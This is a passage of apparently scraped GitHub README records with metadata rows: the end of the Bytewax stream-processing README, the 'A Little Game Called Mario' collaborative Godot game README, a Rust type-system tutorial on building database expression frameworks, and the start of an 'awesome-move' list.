    def build_part(self, step_id, for_part, resume_state):
return PsqlSink()
```
#### Execution
Bytewax dataflows can be executed in a single Python process, or on multiple processes on multiple hosts with multiple worker threads. When processing data in a distributed fashion, Bytewax uses routing keys to ensure your state is updated correctly and automatically.
```sh
# Run a single worker locally.
python -m bytewax.run my_dataflow:flow
# Start two worker threads in a single process.
python -m bytewax.run my_dataflow -w 2
# Start a process on two separate machines to form a Bytewax cluster.
# Start the first process with two worker threads on `machine_one`.
machine_one$ python -m bytewax.run my_dataflow -w 2 -i0 -a "machine_one:2101;machine_two:2101"
# Then start the second process with three worker threads on `machine_two`.
machine_two$ python -m bytewax.run my_dataflow -w 3 -i1 -a "machine_one:2101;machine_two:2101"
```
It can also be run in a Docker container as described further in the [documentation](https://docs.bytewax.io/stable/guide/deployment/container.html).
#### Kubernetes
The recommended way to run dataflows at scale is to leverage the [kubernetes ecosystem](https://docs.bytewax.io/stable/guide/deployment/waxctl.html). To help manage deployment, we built [waxctl](https://docs.bytewax.io/stable/guide/deployment/waxctl.html), which allows you to easily deploy dataflows that will run at huge scale across multiple compute nodes.
```sh
waxctl df deploy my_dataflow.py --name my-dataflow
```
## Why Bytewax?
At a high level, Bytewax provides a few major benefits:
- The operators in Bytewax are largely “data-parallel”, meaning they can operate on independent parts of the data concurrently.
- Bytewax offers the ability to express higher-level control constructs, like iteration.
- Bytewax allows you to develop and run your code locally, and then easily scale that code to multiple workers or processes without changes.
- Bytewax can be used in both a streaming and batch context.
- Ability to leverage the Python ecosystem directly.
## Community
[Slack](https://join.slack.com/t/bytewaxcommunity/shared_invite/zt-vkos2f6r-_SeT9pF2~n9ArOaeI3ND2w) is the main forum for communication and discussion.
[GitHub Issues](https://github.com/bytewax/bytewax/issues) is reserved only for actual issues. Please use the community Slack for discussions.
[Code of Conduct](https://github.com/bytewax/bytewax/blob/main/CODE_OF_CONDUCT.md)
## More Examples
For a more complete example, and documentation on the available operators, check out the [User Guide](https://docs.bytewax.io/stable/guide/index.html) and the [/examples](examples) folder.
## License
Bytewax is licensed under the [Apache-2.0](https://opensource.org/licenses/APACHE-2.0) license.
## Contributing
Contributions are welcome! This community and project would not be what it is without the [contributors](https://github.com/bytewax/bytewax/graphs/contributors). All contributions, from bug reports to new features, are welcome and encouraged.
Please view the [Contribution Guide](https://docs.bytewax.io/stable/guide/contributing/contributing.html) for how to get started.
</br>
</br>
<p align="center"> With ❤️ Bytewax</p>
<p align="center"><img src="https://user-images.githubusercontent.com/6073079/157482621-331ad886-df3c-4c92-8948-9e50accd38c9.png" /> </p>
<img referrerpolicy="no-referrer-when-downgrade" src="https://static.scarf.sh/a.png?x-pxid=07749572-3e76-4ac0-952b-d5dcf3bff737" />
| Python Stream Processing | python,stream-processing,rust,data-engineering,data-processing,data-science,dataflow,machine-learning,streaming-data | 28 | 20 | 383 | 2,355 | 16 | 7 | 4 |
a-little-org-called-mario/a-little-game-called-mario | # A Little Game Called Mario
> **open source collective hell game**
a bad idea from the mind of [izzy kestrel](https://twitter.com/iznaut), inspired by [Aaron San Filippo](https://twitter.com/AeornFlippout)
[![GitHub contributors](https://img.shields.io/github/contributors/a-little-org-called-mario/a-little-game-called-mario.svg)](https://GitHub.com/a-little-org-called-mario/a-little-game-called-mario/graphs/contributors/) [![GitHub contributors](https://img.shields.io/github/workflow/status/a-little-org-called-mario/a-little-game-called-mario/build%20and%20publish.svg)](https://github.com/a-little-org-called-mario/a-little-game-called-mario/actions) [![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)
# 🎮 [play the latest version here](http://play.little-mario.com/) 🎮
[![Screenshot Of A Little Game Called Mario](/.godot_ignore/screenshot.gif)](https://twitter.com/iznaut/status/1508179935977947142)
# 🗣 [join the discord server](http://community.little-mario.com/) (by joining our discord you are agreeing to abide by our [code of conduct](code_of_conduct.md)) 🗣
[![The tweet](.godot_ignore/the_tweet.png)](https://twitter.com/iznaut/status/1508179935977947142)
# about
this is (at least to start) a simple 2D platformer game made with Godot Engine. it exists for all to enjoy - not only as players, but also as Game Developers.
finally, we can put the discourse to rest. are you a Game Developer? no? why not? all you have to do is make some changes to this project. it's that simple.
will you add some art? some music? some new gameplay mechanics? dialog? robust multiplayer functionality with rollback netcode? it's up to you.
> **your contributions are valuable regardless of how experienced you are or where your strengths lie.**
even if you never touch a line of code, you're still valuable as a player who can spot things that are wrong and report them for others to fix.
> **i would even go so far as to say you're still a Game Developer by simply playtesting and providing QA support - games wouldn't exist without those people!**
this is a game that will live or die by its ability to capture a collective imagination and i like to believe that people can do some pretty amazing things when they organize together under a common goal.
so the next time someone asks, "oh, you're a game developer?" you can proudly say:
**"yes. i worked on A Little Game Called Mario. heard of it?"**
# rules
be kind, respectful, and have empathy for your players and fellow developers. this means:
- adding content that improves the player's experience
- adding comments/tools/utilities that make it easier for less experienced developers to contribute
- removing content that is racist, homophobic, transphobic, ableist, or any other number of things that diminish the work and make it less accessible to anyone who might want to play or contribute to it
your contributions should be additive whenever possible.
> **this is not *your* game, it is everyone's game.**
if you believe changing/removing existing features could improve the game, that's great! but please try to get in touch with the people who originally made those choices and see if you can collaborate rather than disregard their hard work.
> **assume their contributions were made with just as much intentionality as yours and should be just as valued.**
don't be shy about talking to new people, be it to collaborate or just to ask for help! you're all here for the same reason: to make a game.
> **the whole point is collaboration and making new friends.**
## please read through our [code of conduct](code_of_conduct.md)!
# contributing
there are many ways to contribute to the project! games are complex things with a lot of moving parts that only exist because collaboration between creative and technical disciplines makes that happen. here are just a few ways you might be able to help out:
## 🎨 **if you're the creative type** 🎨
make something! anything! it doesn't need to be perfect or polished and it certainly doesn't have to be hooked up via code right away! leave a little gift for the more technical/design-minded folks - their eyes will light up as they think of a dozen different ways it could be implemented as a weird new power-up or something.
[learn more about submitting assets](http://assets.little-mario.com/)
## ⚙️ **if you're the technical type** ⚙️
see if there are any open [issues](https://github.com/a-little-org-called-mario/a-little-game-called-mario/issues) to work on! these can range from bug reports to feature requests and some of them may even be tagged as a "good first issue" for new folks. you can also dig around in closed issues and check out what people are actively working on in pull requests.
[learn more about making code changes](https://github.com/a-little-org-called-mario/a-little-game-called-mario/wiki/Contribution-Basics)
## 🤔 **don't forget the designer types!** 🤔
i think these folks get a bad rap (not just saying that bc i'm one of them!!) - design is important and even tho you can't throw a rock without hitting someone with a "good game idea", what you may not appreciate is how hard it actually can be to execute on! and i'm not talking about learning to code or create art to support your vision....we have plenty of folks here who are already experts at those things! but at the same time, those same folks may not think about problems in the same creative way that you do.
check out the [discussions](https://github.com/a-little-org-called-mario/a-little-game-called-mario/discussions) and [issues](https://github.com/a-little-org-called-mario/a-little-game-called-mario/issues) to see if there are any conversations you might be able to contribute to and don't forget to [join our discord](http://community.little-mario.com/) to see what other folks are talking about!
# 🎮 about the game engine 🎮
[Godot Engine](https://godotengine.org/) is a free and open-source tool for making video games. Check out this video for a very quick primer: [The Godot Game Engine Explained in 5 Minutes](https://www.youtube.com/watch?v=KjX5llYZ5eQ)
you can download Godot here:
- [Windows](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_win64.exe.zip)
- [Mac OS X](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_osx.universal.zip)
- [Linux](https://downloads.tuxfamily.org/godotengine/3.4.4/Godot_v3.4.4-stable_x11.64.zip)
> **this project was created with v3.4.4 - if you have an older version installed, we recommend upgrading to avoid compatibility issues during development**
Godot is relatively easy to learn but can be fairly powerful. the documentation is very good and includes some helpful resources:
- [Getting Started](https://docs.godotengine.org/en/3.4/getting_started/introduction/index.html)
- [Your First 2D Game](https://docs.godotengine.org/en/stable/getting_started/first_2d_game/index.html)
- [Tutorials and resources](https://docs.godotengine.org/en/stable/community/tutorials.html)
if videos are more your thing, i recommend these channels:
- [GDQuest](https://www.youtube.com/channel/UCxboW7x0jZqFdvMdCFKTMsQ)
- [Godot Tutorials](https://www.youtube.com/channel/UCnr9ojBEQGgwbcKsZC-2rIg)
> this video was used as reference to create the framework for this project: [Make your first 2D platformer game IN JUST 10 MINUTES](https://www.youtube.com/watch?v=xFEKIWpd0sU)
# this is all rad but i'm still intimidated 😱
i could go on for _hours_ about impostor syndrome and all that junk (stuff i feel, just the same as you!!) but some ppl need more encouragement than others so i won't attempt a one-size fits all spiel here 😉
### but if you have questions/feedback/concerns/ideas/whatev PLEASE don't hesitate to ask for help on our [discord server](http://community.little-mario.com/)!!
## with that, i relinquish all creative control of this beautiful beast. godspeed, Little Mario. make mommy proud 💖
| open source collective hell game | game,game-development,gamedev,godot | 414 | 105 | 492 | 577 | 0 | 2 | 8 |
skyzh/type-exercise-in-rust | # Type Exercise in Rust
This is a short lecture on how to use the Rust type system to build necessary components in a database system.
The lecture revolves around how Rust programmers (like me) build database systems in the Rust programming language. We leverage the Rust type system to **minimize** runtime cost and make our development process easier with **safe**, **nightly** Rust.
In this tutorial, you will learn:
* How to build an Arrow-like library with strong compile-time type. (Day 1 - 3)
* How to use declarative macros to implement dispatch functions on a non-object-safe trait. (Day 4)
* How to use GAT (generic associated types) and how to vectorize any scalar function with GAT generic parameter. (Day 5 - 6)
* ... how to bypass compiler bugs on GAT lifetimes in the `Fn` trait.
* ... how to manually implement covariance on a GAT lifetime.
* ... how to correctly add trait bounds for GATs.
* How to use declarative macros to associate things together. (Day 7)
![Map of Types](map-of-types.png)
## Community
You may join skyzh's Discord server and study with the type-exercise community.
[![Join skyzh's Discord Server](https://dcbadge.vercel.app/api/server/ZgXzxpua3H)](https://skyzh.dev/join/discord)
## See Also...
### RisingLight
[RisingLight](https://github.com/risinglightdb/risinglight) is an OLAP database system for educational purposes. Most of the techniques described in this lecture have already been implemented in our educational database system “RisingLight”.
### Databend
Databend's expression evaluation implementation is greatly influenced by type-exercise. You may see the implementation in [datavalues crate](https://github.com/datafuselabs/databend/blob/main/common/datavalues/src/scalars/mod.rs).
### RisingWave
[RisingWave](https://github.com/singularity-data/risingwave) is a cloud-native streaming database product. It is the first time that I experimented with GAT-related things in RisingWave to auto vectorize expressions. It applies almost the same techniques as described in this lecture.
### TiKV Coprocessor
I worked on TiKV two years ago on its expression evaluation framework. At the time of building the [TiKV coprocessor](https://github.com/tikv/tikv/tree/master/components/tidb_query_expr), there was no GAT. TiKV coprocessor is an example of using procedural macros to unify the behavior of different types of arrays, which is a totally different approach from this tutorial (but maybe more understandable). You may also take a look!
### Related Issues in Rust Compiler
While writing this tutorial, I found several confusing compile errors from the compiler. If all of them had been solved on the Rust side, we could have written GAT programs more easily!
* https://github.com/rust-lang/rust/issues/93342
* https://github.com/rust-lang/rust/issues/93340
## Deep Dive Type Exercise Series (in Chinese)
On My Blog:
* [Part 0 - Part 2](https://www.skyzh.dev/posts/articles/2022-01-22-rust-type-exercise-in-database-executors/)
* [Part 3 - Part 6](https://www.skyzh.dev/posts/articles/2022-01-24-rust-type-exercise-in-database-executors-middle/)
* [Part 7](https://www.skyzh.dev/posts/articles/2022-02-01-rust-type-exercise-in-database-executors-final/)
On Zhihu:
* [Part 0: Intro](https://zhuanlan.zhihu.com/p/460702914)
* [Part 1: Array and ArrayBuilder](https://zhuanlan.zhihu.com/p/460977012)
* [Part 2: Scalar and ScalarRef](https://zhuanlan.zhihu.com/p/461405621)
* [Part 3, 4: TryFrom and Macro Expansion](https://zhuanlan.zhihu.com/p/461657165)
* [Part 5, 6: Bypassing GAT Compile Errors (or Compiler Bugs?)](https://zhuanlan.zhihu.com/p/461901665)
* [Part 7: Associate Logical Types with Physical Types](https://zhuanlan.zhihu.com/p/463477290)
## Day 1: `Array` and `ArrayBuilder`
`ArrayBuilder` and `Array` are reciprocal traits. `ArrayBuilder` creates an `Array`, while we can create a new array
using `ArrayBuilder` with an existing `Array`. In day 1, we implement arrays for primitive types (like `i32`, `f32`)
and for variable-length types (like `String`). We use associated types in traits to deduce the right type in generic
functions and use GAT to unify the `Array` interfaces for both fixed-length and variable-length types. This framework
is also very similar to libraries like Apache Arrow, but with much stronger type constraints and much lower runtime
overhead.
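Concretely, the two reciprocal traits could look roughly like the following sketch (the repository's definitions carry more methods and bounds, so treat the exact signatures here as assumptions):

```rust
pub trait Array: Send + Sync + Sized + 'static {
    /// The builder that produces this kind of array.
    type Builder: ArrayBuilder<Array = Self>;

    /// A reference to an item. This is a GAT so that `StringArray` can hand
    /// out `&'a str` while `I32Array` simply hands out `i32`.
    type RefItem<'a>: Copy
    where
        Self: 'a;

    /// Get the item at `idx`, or `None` if it is null.
    fn get(&self, idx: usize) -> Option<Self::RefItem<'_>>;

    /// Number of items (including nulls) in the array.
    fn len(&self) -> usize;
}

pub trait ArrayBuilder {
    /// The array this builder produces.
    type Array: Array<Builder = Self>;

    fn with_capacity(capacity: usize) -> Self;
    fn push(&mut self, item: Option<<Self::Array as Array>::RefItem<'_>>);
    fn finish(self) -> Self::Array;
}
```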
The special thing is that we use a blanket implementation for `i32` and `f32` arrays -- `PrimitiveArray<T>`. This would
make our journey much more challenging, as we need to carefully evaluate the trait bounds needed for them in the
following days.
### Goals
Developers can create generic functions over all types of arrays -- no matter fixed-length primitive array like
`I32Array`, or variable-length array like `StringArray`.
Without our `Array` trait, developers might have to implement...
```rust
fn build_i32_array_from_vec(items: &[Option<i32>]) -> Vec<i32> { /* .. */ }
fn build_str_array_from_vec(items: &[Option<&str>]) -> Vec<String> { /* .. */ }
```
Note that the functions take different parameter types -- one `i32` without a lifetime, one `&str`. Our `Array` trait
can unify their behavior:
```rust
fn build_array_from_vec<A: Array>(items: &[Option<A::RefItem<'_>>]) -> A {
let mut builder = A::Builder::with_capacity(items.len());
for item in items {
builder.push(*item);
}
builder.finish()
}
#[test]
fn test_build_int32_array() {
let data = vec![Some(1), Some(2), Some(3), None, Some(5)];
let array = build_array_from_vec::<I32Array>(&data[..]);
}
#[test]
fn test_build_string_array() {
let data = vec![Some("1"), Some("2"), Some("3"), None, Some("5"), Some("")];
let array = build_array_from_vec::<StringArray>(&data[..]);
}
```
Also, we will be able to implement an `ArrayIterator` for all types of `Array`s.
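For instance, a single `ArrayIterator` can be written once against the `Array` trait (a sketch, assuming the trait shape from the snippet above):

```rust
/// An iterator over any `Array`, written once for all array types.
pub struct ArrayIterator<'a, A: Array> {
    array: &'a A,
    pos: usize,
}

impl<'a, A: Array> Iterator for ArrayIterator<'a, A> {
    /// `None` means a null value at that position.
    type Item = Option<A::RefItem<'a>>;

    fn next(&mut self) -> Option<Self::Item> {
        if self.pos < self.array.len() {
            let item = self.array.get(self.pos);
            self.pos += 1;
            Some(item)
        } else {
            None
        }
    }
}
```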
## Day 2: `Scalar` and `ScalarRef`
`Scalar` and `ScalarRef` are reciprocal types. We can get a reference `ScalarRef` of a `Scalar`, and convert
`ScalarRef` back to `Scalar`. By adding these two traits, we can write more generic functions with zero runtime
overhead on type matching and conversion. Meanwhile, we associate `Scalar` with `Array`, so as to write functions
more easily.
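As a sketch, the two traits could be shaped like this (simplified; the tutorial's real traits also link back to the corresponding `Array` type):

```rust
/// An owned, `'static` scalar value such as `i32` or `String`.
pub trait Scalar: Send + Sync + 'static {
    /// The corresponding reference type, e.g. `&'a str` for `String`.
    type RefType<'a>: ScalarRef<'a, ScalarType = Self>
    where
        Self: 'a;

    /// Get a reference to this owned scalar.
    fn as_scalar_ref(&self) -> Self::RefType<'_>;
}

/// A reference to a scalar value, such as `&'a str` or a plain `i32`.
pub trait ScalarRef<'a>: Copy + 'a {
    /// The corresponding owned type, e.g. `String` for `&'a str`.
    type ScalarType: Scalar<RefType<'a> = Self>;

    /// Convert the reference back into an owned scalar.
    fn to_owned_scalar(&self) -> Self::ScalarType;
}
```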
### Goals
Without our `Scalar` implementation, there could be problems:
```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
let mut builder = A::Builder::with_capacity(len);
for _ in 0..len {
builder.push(Some(item /* How to convert `item` to `RefItem`? */));
}
builder.finish()
}
```
With the `Scalar` trait and its corresponding implementations,
```rust
fn build_array_repeated_owned<A: Array>(item: A::OwnedItem, len: usize) -> A {
let mut builder = A::Builder::with_capacity(len);
for _ in 0..len {
builder.push(Some(item.as_scalar_ref())); // Now we have `as_scalar_ref` on `Scalar`!
}
builder.finish()
}
```
## Day 3: `ArrayImpl`, `ArrayBuilderImpl`, `ScalarImpl` and `ScalarRefImpl`
Some information might not be available until runtime. Therefore, we use `XXXImpl` enums to
cover all variants of a single type. At the same time, we also add `TryFrom<ArrayImpl>` and `Into<ArrayImpl>`
bound for `Array`.
### Goals
This is hard -- imagine we simply require `TryFrom<ArrayImpl>` and `Into<ArrayImpl>` bound on `Array`:
```rust
pub trait Array:
Send + Sync + Sized + 'static + TryFrom<ArrayImpl> + Into<ArrayImpl>
```
Compiler will complain:
```
43 | impl<T> Array for PrimitiveArray<T>
| ^^^^^ the trait `From<PrimitiveArray<T>>` is not implemented for `array::ArrayImpl`
|
= note: required because of the requirements on the impl of `Into<array::ArrayImpl>` for `PrimitiveArray<T>`
```
This is because we use a blanket implementation for `PrimitiveArray` to cover all primitive types. In day 3,
we learn how to correctly add bounds to `PrimitiveArray`.
## Day 4: More Types and Methods with Macro
`ArrayImpl` should support common functions in traits, but the `Array` trait doesn't have a unified interface for
all types -- `I32Array` accepts `get(&self, idx: usize) -> Option<i32>` while `StringArray` accepts
`get(&self, idx: usize) -> &str`. We need a `get(&self, idx:usize) -> ScalarRefImpl<'_>` on `ArrayImpl`. Therefore,
we have to write the match arms to dispatch the methods.
Also, we have written so much boilerplate code for `From` and `TryFrom`. We need to eliminate such duplicated code.
As we are having more and more data types, we need to write the same code multiple times within a match arm. In
day 4, we use declarative macros (instead of procedural macros or other kinds of code generator) to generate such
code and avoid writing boilerplate code.
### Goals
Before that, we need to implement every `TryFrom` or `Scalar` by ourselves:
```rust
impl<'a> ScalarRef<'a> for i32 {
type ArrayType = I32Array;
type ScalarType = i32;
fn to_owned_scalar(&self) -> i32 {
*self
}
}
// repeat the same code for i64, f64, ...
```
```rust
impl ArrayImpl {
/// Get the value at the given index.
pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> {
match self {
Self::Int32(array) => array.get(idx).map(ScalarRefImpl::Int32),
Self::Float64(array) => array.get(idx).map(ScalarRefImpl::Float64),
// ...
            // repeat the types for every function we added on `Array`
        }
    }
}
```
With macros, we can easily add more and more types. In day 4, we will support:
```rust
pub enum ArrayImpl {
Int16(I16Array),
Int32(I32Array),
Int64(I64Array),
Float32(F32Array),
Float64(F64Array),
Bool(BoolArray),
String(StringArray),
}
```
All of this with little code changed and no hand-written boilerplate.
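The trick is a pair of declarative macros: one macro owns the list of all variants, and it invokes a "callback" macro with that list to stamp out the repetitive code. A minimal sketch of the pattern (macro names here are illustrative, and `ArrayImpl`/`ScalarRefImpl` are the enums from the previous days):

```rust
/// Single source of truth: every variant is listed exactly once.
macro_rules! for_all_variants {
    ($macro:ident) => {
        $macro! {
            { Int32, I32Array },
            { Float64, F64Array }
        }
    };
}

/// Callback that expands the variant list into the match arms of `get`.
macro_rules! impl_array_impl_get {
    ($({ $variant:ident, $array:ty }),*) => {
        impl ArrayImpl {
            pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> {
                match self {
                    $(Self::$variant(array) => array.get(idx).map(ScalarRefImpl::$variant),)*
                }
            }
        }
    };
}

// One invocation generates all the boilerplate match arms.
for_all_variants! { impl_array_impl_get }
```

Adding a new type then only means touching the list inside `for_all_variants!`.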
## Day 5: Binary Expressions
Now that we have `Array`, `ArrayBuilder`, `Scalar` and `ScalarRef`, we can convert every function we wrote to a
vectorized one using generics.
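Under the hood, vectorizing a scalar function just means running the day 1 loop around it. Spelled out for one concrete pair of array types, it would look roughly like this (a sketch that assumes the day 1 arrays, builders and an `iter` method):

```rust
/// What `BinaryExpression::eval` conceptually does for `StringArray` inputs.
fn vectorized_str_contains(i1: &StringArray, i2: &StringArray) -> BoolArray {
    let mut builder = BoolArrayBuilder::with_capacity(i1.len());
    for (a, b) in i1.iter().zip(i2.iter()) {
        // Null in, null out: only call the scalar function when both sides
        // are present.
        builder.push(match (a, b) {
            (Some(a), Some(b)) => Some(str_contains(a, b)),
            _ => None,
        });
    }
    builder.finish()
}
```

The generic `BinaryExpression` does the same thing once for all array types, which is exactly where GAT lifetimes start to bite.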
### Goals
Developers will only need to implement:
```rust
pub fn str_contains(i1: &str, i2: &str) -> bool {
i1.contains(i2)
}
```
And they can create `BinaryExpression` around this function with any type:
```rust
// Vectorize `str_contains` to accept an array instead of a single value.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(str_contains);
// We only need to pass `ArrayImpl` to the expression, and it will do everything for us,
// including type checks, looping, etc.
let result = expr
.eval(
&StringArray::from_slice(&[Some("000"), Some("111"), None]).into(),
&StringArray::from_slice(&[Some("0"), Some("0"), None]).into(),
)
.unwrap();
```
Developers can even create `BinaryExpression` around generic functions:
```rust
pub fn cmp_le<'a, I1: Array, I2: Array, C: Array + 'static>(
i1: I1::RefItem<'a>,
i2: I2::RefItem<'a>,
) -> bool
where
I1::RefItem<'a>: Into<C::RefItem<'a>>,
I2::RefItem<'a>: Into<C::RefItem<'a>>,
C::RefItem<'a>: PartialOrd,
{
i1.into().partial_cmp(&i2.into()).unwrap() == Ordering::Less
}
```
```rust
// Vectorize `cmp_le` to accept an array instead of a single value.
let expr = BinaryExpression::<I32Array, I32Array, BoolArray, _>::new(
cmp_le::<I32Array, I32Array, I64Array>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();
// `cmp_le` can also be used on `&str`.
let expr = BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(
cmp_le::<StringArray, StringArray, StringArray>,
);
let result: ArrayImpl = expr.eval(ArrayImpl, ArrayImpl).unwrap();
```
## Day 6: Erase Expression Lifetime
Vectorization looks fancy in the implementation in day 5, but there is a critical flaw -- `BinaryExpression`
can only process `&'a ArrayImpl` instead of references with any lifetime.
```rust
impl<'a, I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
pub fn eval(&self, i1: &'a ArrayImpl, i2: &'a ArrayImpl) -> Result<ArrayImpl> {
// ...
}
}
```
In day 6, we erase the expression lifetime by defining a `BinaryExprFunc` trait and implementing it for all expression
functions. The `BinaryExpression` will be implemented as follows:
```rust
impl<I1: Array, I2: Array, O: Array, F> BinaryExpression<I1, I2, O, F> {
pub fn eval(&self, i1: &ArrayImpl, i2: &ArrayImpl) -> Result<ArrayImpl> {
// ...
}
}
```
And there will be an `Expression` trait which can be made into a trait object:
```rust
pub trait Expression {
/// Evaluate an expression with run-time number of [`ArrayImpl`]s.
fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```
In this day, we have two solutions -- the hard way and the easy way.
### Goals -- The Easy Way
If we make each scalar function into a struct, things will be a lot easier.
Developers will now implement scalar function as follows:
```rust
pub struct ExprStrContains;
impl BinaryExprFunc<StringArray, StringArray, BoolArray> for ExprStrContains {
fn eval(&self, i1: &str, i2: &str) -> bool {
i1.contains(i2)
}
}
```
And now we can have an expression trait over all expression, with all type and lifetime erased:
```rust
pub trait Expression {
/// Evaluate an expression with run-time number of [`ArrayImpl`]s.
fn eval_expr(&self, data: &[&ArrayImpl]) -> Result<ArrayImpl>;
}
```
`Expression` can be made into a `Box<dyn Expression>`, therefore being used in building expressions at runtime.
### ~~Goals -- The Hard Way~~
As [rust-lang/rust #90887](https://github.com/rust-lang/rust/pull/90887) has landed, the compiler bugs have been fixed, so we don't need to do any extra work for this day to support function expressions. All `BinaryExprFunc` can be replaced with `F: Fn(I1::RefType<'_>, I2::RefType<'_>) -> O`.
In the hard way chapter, we will dive into the black magic and fight against (probably) compiler bugs, so as
to make function vectorization look very approachable to SQL function developers.
To begin with, we will change the signature of `BinaryExpression` to take `Scalar` as parameter:
```rust
pub struct BinaryExpression<I1: Scalar, I2: Scalar, O: Scalar, F> {
func: F,
_phantom: PhantomData<(I1, I2, O)>,
}
```
Then we will do a lot of black magic on the `Scalar` type, so as to do the conversion freely between `Array::RefItem`
and `Scalar::RefType`. This will help us bypass most of the issues in GAT, and yields the following vectorization
code:
```rust
builder.push(Some(O::cast_s_to_a(
self.func
.eval(I1::cast_a_to_s(i1), I2::cast_a_to_s(i2))
.as_scalar_ref(),
)))
```
We will construct a bridge trait `BinaryExprFunc` between plain functions and the one that can be used by
`BinaryExpression`.
And finally developers can simply write a function and supply it to `BinaryExpression`.
```rust
let expr = BinaryExpression::<String, String, bool, _>::new(str_contains);
```
... or even with lambda functions:
```rust
let expr = BinaryExpression::<String, String, bool, _>::new(|x1: &str, x2: &str| x1.contains(x2));
```
## Day 7: Physical Data Type and Logical Data Type
`i32`, `i64` is simply physical types -- how types are stored in memory (or on disk). But in a database system,
we also have logical types (like `Char`, and `Varchar`). In day 7, we learn how to associate logical types with
physical types using macros.
### Goals
Going back to our `build_binary_expression` function,
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
) -> Box<dyn Expression> {
match f {
CmpLe => Box::new(BinaryExpression::<I32Array, I32Array, BoolArray, _>::new(
ExprCmpLe::<_, _, I32Array>(PhantomData),
)),
/* ... */
```
Currently, we only support `i32 < i32` for the `CmpLe` expression. We should be able to support cross-type comparisons here.
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType
) -> Box<dyn Expression> {
match f {
CmpLe => match (i1, i2) {
(SmallInt, SmallInt) => /* I16Array, I16Array */,
(SmallInt, Real) => /* I16Array, Float32, cast to Float64 before comparison */,
/* ... */
}
/* ... */
```
There are so many combinations of cross-type comparison that we couldn't write them all by hand. In day 7, we use
macros to associate logical data types with `Array` types, and reduce the complexity of writing such functions.
### Goals -- The Easy Way
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType,
) -> Box<dyn Expression> {
use ExpressionFunc::*;
use crate::array::*;
use crate::expr::cmp::*;
use crate::expr::string::*;
match f {
CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpLe },
CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpGe },
CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpEq },
CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, ExprCmpNe },
StrContains => Box::new(
BinaryExpression::<StringArray, StringArray, BoolArray, _>::new(ExprStrContains),
),
}
}
```
### Goals -- The Hard Way
```rust
/// Build expression with runtime information.
pub fn build_binary_expression(
f: ExpressionFunc,
i1: DataType,
i2: DataType,
) -> Box<dyn Expression> {
use ExpressionFunc::*;
use crate::expr::cmp::*;
use crate::expr::string::*;
match f {
CmpLe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_le },
CmpGe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ge },
CmpEq => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_eq },
CmpNe => for_all_cmp_combinations! { impl_cmp_expression_of, i1, i2, cmp_ne },
StrContains => Box::new(BinaryExpression::<String, String, bool, _>::new(
str_contains,
)),
}
}
```
The goal is to write as little code as possible to generate all combinations of comparisons.
## Day 8: List Type
In Apache Arrow, we have `ListArray`, which is equivalent to `Vec<Option<Vec<Option<T>>>>`. We implement this in
day 8.
```rust
let mut builder = ListArrayBuilder::with_capacity(0);
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(Some((&/* Some ArrayImpl */).into()));
builder.push(None);
builder.finish();
```
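Internally, an Arrow-style list array is usually stored flattened rather than as nested `Vec`s. A possible layout looks like this (a sketch, not necessarily the exact fields used in day 8):

```rust
pub struct ListArray {
    /// All items of all lists, concatenated into one child array.
    child: ArrayImpl,
    /// `offsets[i]..offsets[i + 1]` is the range of the i-th list in `child`.
    offsets: Vec<usize>,
    /// Validity bitmap: whether the i-th list itself is null.
    valid: Vec<bool>,
}
```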
## Day 9: Boxed Array
Use `Box<dyn Array>` instead of `ArrayImpl` enum.
To make as few modifications as possible to the current codebase, we add two traits:
* `PhysicalTypeOf`: gets the physical type out of Array.
* `DynArray`: the object safe trait for Array.
Then, we can have `pub struct BoxedArray(Box<dyn DynArray>);` for dynamic dispatch.
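A sketch of how these pieces could fit together (signatures are illustrative; `ScalarRefImpl` is the runtime enum from day 3):

```rust
/// Object-safe counterpart of `Array`: no GATs in the interface, so it can
/// live behind `dyn`.
pub trait DynArray: Send + Sync + 'static {
    fn len(&self) -> usize;
    /// Type-erased access returns the runtime enum instead of a GAT.
    fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>>;
}

/// Dynamic-dispatch wrapper used in place of the `ArrayImpl` enum.
pub struct BoxedArray(Box<dyn DynArray>);

impl BoxedArray {
    pub fn get(&self, idx: usize) -> Option<ScalarRefImpl<'_>> {
        self.0.get(idx)
    }
}
```

The trade-off is dynamic dispatch on every call, in exchange for not having to enumerate every variant in an enum.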
## Day 10: Expression Framework
Now we have more and more expression kinds, and we need an expression framework to unify them -- including
unary, binary and expressions of more inputs.
At the same time, we will also experiment with return value optimizations in variable-size types.
# TBD Lectures
## Day 11: Aggregators
Aggregators are another kind of expression. We will learn how to implement them easily with our type system in day 11.
| Learn Rust black magics by implementing an expression framework in database systems | rust,database,type,tutorial | 0 | 6 | 12 | 57 | 0 | 3 | 1 |
MystenLabs/awesome-move | <!--lint disable double-link-->
# Awesome Move [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
> A curated list of code and content from the [Move](https://github.com/move-language/move) programming language community.
